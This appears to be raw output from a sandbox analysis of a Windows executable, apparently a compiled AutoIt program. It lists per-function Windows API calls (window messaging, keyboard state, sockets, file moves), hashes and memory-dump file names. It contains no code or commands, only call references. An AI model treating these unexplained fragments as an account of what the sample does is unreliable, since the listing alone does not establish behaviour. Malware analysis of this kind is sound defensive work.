• Instruction ID: 59dda1b2b9c9f9214bb3be31a0c205aab22e6dcee72b9b7883a9afd7e97de9fa
• Opcode Fuzzy Hash: cc6f3472e8cd362a09c056b0e535b686855306b7833c8743f138612a747e5812
• Instruction Fuzzy Hash: 5E41A566C11118B5CB11FBB8CD8ABDFB768AF45720F504466E508E3121FB34E251C7A6
APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009AFC41
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009EFC15
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 009EFC98
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: 7dd95e3a866a514123c7f639017769f1daf2b53da3843392a3a4a4c9f49718fc
• Instruction ID: 4032ee5481bd4bf3cb67ced6b520f79300934d184ad3dc4b06f6ef469b9910a9
• Instruction Fuzzy Hash: D04119316087C89AC7358BBFC9B87397BB5AB87320F34493DE9C6469A1C679A841C750
APIs
• DeleteObject.GDI32(00000000), ref: 00A237B7
• GetDC.USER32(00000000), ref: 00A237BF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A237CA
• ReleaseDC.USER32(00000000,00000000), ref: 00A237D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A23812
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A23823
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A26504,?,?,000000FF,00000000,?,000000FF,?), ref: 00A2385E
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A2387D
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 896d142b07c971d81feb7b3996d96b421b56fe5f20b64567684e322654fdcc4b
• Instruction ID: b30ade1d054b0df7b5f2235f7a07b68e7098f72907a56cc2308446978a3eae8c
• Instruction Fuzzy Hash: 18318F721012247FEF218F58DC49FFB3BA9EB4A711F044065FE099A191C6B99842C7A4
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 8e2fa427864d29a0cfab4d9112624db6e2421a8b2625f86c3d8a60ce6ed1e256
• Instruction ID: 05412fe3bc5132dd17145ab0438b26ba1dbc974c8010cf6cc7778f944f0de95d
• Instruction Fuzzy Hash: 92D1A071E0060ADFDB10CFA8D885AEEB7B5FF88344F148569E915AB281E770ED85CB50
APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 009D194E
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D19D1
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,009D1B7B,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1A64
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1A7B
  • Part of subcall function 009C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,009D1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009D1AF7
• __freea.LIBCMT ref: 009D1B22
• __freea.LIBCMT ref: 009D1B2E
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
• Opcode ID: 12f5795d6f324ab9574bb522c7ad1f96c4b3522c0d062a1de8fb4148db525974
• Instruction ID: 1da307dff5356a3d78e2558b789841e9009d4ff8be9a7bc094661a21aaeb327d
• Instruction Fuzzy Hash: 3191B673E80216BADB248EA4D851EEEBBB99F49310F18851BE805E7341E739DD41C760
APIs
Strings
Similarity
• API ID: Variant$ClearInit
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2610073882-625585964
• Opcode ID: 78d511fcb37d1be044dc35e7133035783aa66b913f443efd54cc59d14760bc67
• Instruction ID: a6f0cd56d871801b7c9ad0908be1ea15438f7d5d06d76dcd4236ab7ed5752ea2
• Instruction Fuzzy Hash: B0917C71E00619EFDF24DFA4C888FEEBBB8AF85714F108519F515AB280D7709985CBA0
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A01C1B
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01C43
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A01C67
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01C97
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01D1E
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01D83
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A01DEF
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2550207440-0
                                                                                                                                                                                                                                  • Opcode ID: 92b7c99b4c5250753762cd6b2e0803a8bf2304c45ce1b0b259f600433862bca8
                                                                                                                                                                                                                                  • Instruction ID: 734f926afa967d7805f0801708078abff437e9bcd64e8e055bf24a73a129141e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92b7c99b4c5250753762cd6b2e0803a8bf2304c45ce1b0b259f600433862bca8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A91BD71A00219AFEB00DFA8E885BFEB7B4FF45725F148029E951AB2D1D774E941CB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00A143C8
                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00A144D7
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A144E7
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00A1467C
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantInit.OLEAUT32(00000000), ref: 00A016DE
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantCopy.OLEAUT32(?,?), ref: 00A016E7
                                                                                                                                                                                                                                    • Part of subcall function 00A0169E: VariantClear.OLEAUT32(?), ref: 00A016F3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                  • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                  • Opcode ID: d609b9a061cf62c2d71b595677ee0b62e5f9b6feefe6d6ce5de9ac73410bed3c
                                                                                                                                                                                                                                  • Instruction ID: a13d4a30bec57607497a176c914a75d3928b59a65a501325cfef90bc2a151834
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d609b9a061cf62c2d71b595677ee0b62e5f9b6feefe6d6ce5de9ac73410bed3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 799159746083019FCB14EF68C5809AAB7E5FF89714F14892DF89A9B351DB31ED46CB82
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?,?,009F0C4E), ref: 009F091B
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0936
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?,?), ref: 009F0944
                                                                                                                                                                                                                                    • Part of subcall function 009F08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009F0831,80070057,?), ref: 009F0954
                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A156AE
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A157B6
                                                                                                                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A1582C
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00A15837
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                  • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                  • Opcode ID: 746231fa5d7fe9c1f20d757403938ba59f2dc163eb18c0608eabc144ca9e6c68
                                                                                                                                                                                                                                  • Instruction ID: dcfe8e237b9a65c26d5ced9e418016056638a683d8d6010d9d02a07e428124fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 746231fa5d7fe9c1f20d757403938ba59f2dc163eb18c0608eabc144ca9e6c68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E911771D0021DEFDF10DFA8D881AEEB7B9BF48310F10456AE915A7291EB349A45CFA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 00A22C1F
                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00A22C51
                                                                                                                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A22C79
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A22CAF
                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00A22CE9
                                                                                                                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00A22CF7
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A22D7F
                                                                                                                                                                                                                                    • Part of subcall function 009FF292: Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4196846111-0
                                                                                                                                                                                                                                  • Opcode ID: 2ae49b190ff8b4cae51576e5bbf199699589b967a023530f27254e4103afb43e
                                                                                                                                                                                                                                  • Instruction ID: 8622ed60eb149539953ecea1377709778a1fc3932402cd566ef6bea2b9e52c92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae49b190ff8b4cae51576e5bbf199699589b967a023530f27254e4103afb43e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7717075A00215AFCF14EF68D945BAEB7B1EF88310F148469E816EB351DB74ED42CB90
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsWindow.USER32(00000000), ref: 00A28992
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00A2899E
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A28A79
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 00A28AAC
• IsDlgButtonChecked.USER32(?,00000000), ref: 00A28AE4
• GetWindowLongW.USER32(00000000,000000EC), ref: 00A28B06
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A28B1E
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 3a640211ba9af27d360fda259f1185b7a5074474551e948e9001c73f61db6387
• Instruction ID: dabc1da964746230bf2e2fec65f0ef29465e6f3c97bd2dbcc0e49fd172256094
• Opcode Fuzzy Hash: 3a640211ba9af27d360fda259f1185b7a5074474551e948e9001c73f61db6387
• Instruction Fuzzy Hash: F171AF74602224AFEB21DF98E884FBA7BB9FF49340F140469F94567261CB39AD81CB50
APIs
• GetParent.USER32(?), ref: 009FB8C0
• GetKeyboardState.USER32(?), ref: 009FB8D5
• SetKeyboardState.USER32(?), ref: 009FB936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 009FB964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 009FB983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 009FB9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 009FB9E7
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: dbcd077248d04da970b8635e05fde326afa3ce66f782a57deedaf3572d0c4d3f
• Instruction ID: c95742cdc99cad831bc7cfda319b6a31967cb9814d76c9a01b1faccd45b0286a
• Opcode Fuzzy Hash: dbcd077248d04da970b8635e05fde326afa3ce66f782a57deedaf3572d0c4d3f
• Instruction Fuzzy Hash: 1351AFA06087D93EFB364A38CC55BBABEAD5B46708F088489E3D5468D2C3D8EDC4D750
APIs
• GetParent.USER32(00000000), ref: 009FB6E0
• GetKeyboardState.USER32(?), ref: 009FB6F5
• SetKeyboardState.USER32(?), ref: 009FB756
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 009FB782
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 009FB79F
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009FB7DE
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009FB7FF
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 6c932efb9ab1505824889f3e54515ba2a67141aed04f7f9437c547f57f1c22dd
• Instruction ID: f7962494b12551d883a0e75b96bfd594b8a84e19920d451e77cc66982ad9410d
• Opcode Fuzzy Hash: 6c932efb9ab1505824889f3e54515ba2a67141aed04f7f9437c547f57f1c22dd
• Instruction Fuzzy Hash: BF5106A0A087D93DFB329B74CC55B7A7EAD6B85344F0C8489E2D5468D2D394EC84D750
APIs
• GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,009C5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 009C57E3
• __fassign.LIBCMT ref: 009C585E
• __fassign.LIBCMT ref: 009C5879
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 009C589F
• WriteFile.KERNEL32(?,FF8BC35D,00000000,009C5F16,00000000,?,?,?,?,?,?,?,?,?,009C5F16,?), ref: 009C58BE
• WriteFile.KERNEL32(?,?,00000001,009C5F16,00000000,?,?,?,?,?,?,?,?,?,009C5F16,?), ref: 009C58F7
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 2f51fda67d9a11effcca8f0ef2a8c4ee27fc563de9fbaf01f31399bfba27633a
• Instruction ID: 03623653090ec4e55ad8394d9270d3bbe1e4b6e894f94925ba783bf830f41de4
• Opcode Fuzzy Hash: 2f51fda67d9a11effcca8f0ef2a8c4ee27fc563de9fbaf01f31399bfba27633a
• Instruction Fuzzy Hash: 4E51A070E00649AFCB10CFA8D881FEEBBB8EF08310F15415EE952E7291D730A981DB61
APIs
• _ValidateLocalCookies.LIBCMT ref: 009B30BB
• ___except_validate_context_record.LIBVCRUNTIME ref: 009B30C3
• _ValidateLocalCookies.LIBCMT ref: 009B3151
• __IsNonwritableInCurrentImage.LIBCMT ref: 009B317C
• _ValidateLocalCookies.LIBCMT ref: 009B31D1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 33e10974302683227e09ab6bee274790542596c6f62f9f524f4051ff29232e04
• Instruction ID: 2085ce4f443211d3ef6c497acc8ef2540f34987297a301726c58d4829f4b769f
• Opcode Fuzzy Hash: 33e10974302683227e09ab6bee274790542596c6f62f9f524f4051ff29232e04
• Instruction Fuzzy Hash: C7416D34A04218ABCB10DFACC985AEEBBA9AF45334F14C555E815AB392D7319B05CB91
APIs
  • Part of subcall function 00A13AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A13AD7
  • Part of subcall function 00A13AAB: _wcslen.LIBCMT ref: 00A13AF8
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A11B6F
• WSAGetLastError.WSOCK32 ref: 00A11B7E
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A11C26
                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00A11C56
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2675159561-0
                                                                                                                                                                                                                                  • Opcode ID: 240a6a9b38cdebeb14e75314bd9e3643cf9e1664c3ed3ed5d79881b6b7f2f556
                                                                                                                                                                                                                                  • Instruction ID: d60d7ab2ff4f573aaf0f958c42097b20522de692bd74676188b19ce773f8b422
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 240a6a9b38cdebeb14e75314bd9e3643cf9e1664c3ed3ed5d79881b6b7f2f556
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41D671604114AFDB20DF68C845BF9B7E9EF85324F148069F9099B292D774ED82CBE1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009FD7CD,?), ref: 009FE714
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009FD7CD,?), ref: 009FE72D
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009FD7F0
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009FD82A
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FD8B0
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FD8C6
                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 009FD90C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                  • Opcode ID: ec9686c870e6144116a3b8950e825cdeb9731a015e1f9692d057f67b9639e140
                                                                                                                                                                                                                                  • Instruction ID: 2f4653f5ebabf068aef34ab760a258886345f7bd0555fd6cec5d079fd501f00c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9686c870e6144116a3b8950e825cdeb9731a015e1f9692d057f67b9639e140
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC41997180621C9EDF12EFA4D985BED77BDAF48380F1004E6E605EB152EB34A788CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A238B8
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A238EB
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A23920
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A23952
